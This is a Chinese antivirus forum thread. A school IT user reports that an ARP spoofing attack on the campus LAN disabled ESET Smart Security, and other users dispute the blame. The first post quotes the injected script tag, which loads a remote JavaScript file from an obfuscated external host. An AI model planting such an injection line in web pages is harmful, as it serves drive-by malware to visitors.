ESS 的神话已经破灭了

qfnuzlr

最近我们单位局域网，arp欺骗盛行，大部分计算机被感染病毒。
网络瘫痪、堵塞。
只要打开ie只要打开一个网页 比如最简单的www.baidu.com
查看源代码 第一行被加入了
<script language=javascript src=http://h%376.x%6Frg.%70l/a.js></script>     

然后：在打开其他网页，可以看到ie状态栏在加载，挂马网站。
期间：ess没有任何反应和提示，彩影arp防火墙6.0提示有arp攻击。
不大一会：ess自动从系统退出，主程序被删除、重启计算机。没有了ess的踪迹。
我按的是ESS 3.0.669 病毒库是最新的
病毒文件：是system32下 winnec.ime winneh.ime(这是东方微点工作人员帮我找到的病毒文件，不过很怪啊，这病毒ESET可以检测出来，用u盘拷到同事电脑上卡巴斯基检测无毒)
以上是本人亲身体会
单位电脑很多以前都是给装这个的 在这次病毒来袭中 全部 葬身
目前 诺顿 卡巴斯基 瑞星 顶住了 袭击
目前同事都是安装卡巴斯基 kis7 上网时频繁提示有病毒
我们是学校 老师400多 每人一台笔记本 机房也有几百台电脑
没有正式管理的 学校是100M光缆接入 用交换机vlan划分几个网段(网通帮忙安装的) 很多年了 没有再改进 平时网速很慢 常断网 早上网速可以达3M到，假期可以到近10M。上班时间几百k就不错了。
单位没有购买杀毒软件 什么防火墙等一概没有 电脑坏了都是同事之间帮忙安装
电脑配置比较低，联想E390M，512M内存，1.7GCPU。卡巴斯基有些卡，ess还行，nod32很爽内存占用很小，机器也不卡用的最多。但是在这次事件中，搞得大家很被动。用的最多的nod32都被灭了。即使装上彩影arp防火墙也无可奈何。在这几天的实践中，卡巴没有问题，ess装上后很快就消失，不得不重新装系统。

23kk234

ESS有不错的ARP入侵检测功能啊

没有发现过楼主说的问题

吾与谁归

楼主不要随便使用原创标签，可能要扣分的
ARP攻击只有用彩影、金山等专业的ARP防火墙才行，即使诺顿、卡巴等也是无济于事的

ps.ESET的防火墙确实算不上顶级，要求比较高的话就用op、za等专业墙，单位局域网环境推荐安装彩影ARP防火墙

不过楼主单位的病毒还真是忒狠了。。。

ok81893

关注一下，，，，

xmiangui

ESET 3.0被干掉了，3.0我记得根本没自我防护模块的吧，更别说神话了，更更别说破灭了。

楼主因此说3.0不好我觉得是可以理解的，不过说神话破灭也...


又是马甲，又是几乎一样的标题...唉，是不是故意来找茬的。如果说ESET被神化了查杀率高和自我防护牛，那这篇帖子也许写得恰当。

可惜基本上没人神话ESET的这两点，就算有也是被人说杀国产木马不行（虽然我没觉得）、网页防护不够好（虽然我也没觉得其他的高明很多），ESS防火墙不好（这个倒蛮有可能的）。
话说ESET什么时候特点是查杀率和自我防护了（特别是4.0才有的自我防护模块）...囧。

硬要说“神话”破灭也该说现在ESET杀马特牛或者4.2网页防护特牛之类的才符合逻辑或者NOD2.7资源占用爆高之类的，或者只是标题党罢了。

单位电脑很多以前都是给装这个的 在这次病毒来袭中 全部 葬身
目前 诺顿 卡巴斯基 瑞星 顶住了 袭击
qfnuzlr 发表于 2010-4-1 17:58

我先不说该死的空格式文法，我怀疑你们公司是不是每个领导手下的员工都装一种不同的杀软，或者楼主根本就没见过企业环境下的企业版杀软、硬件防火墙和网络策略。你们公司挡网络攻击靠的是终端顶的吗？

冲冲

慎用“原创”标签……

皇柝

nod32不适合企业用户啊

ming9888

楼主应该仔细看看楼下几位的发言，不要轻易给某杀毒软件带帽子。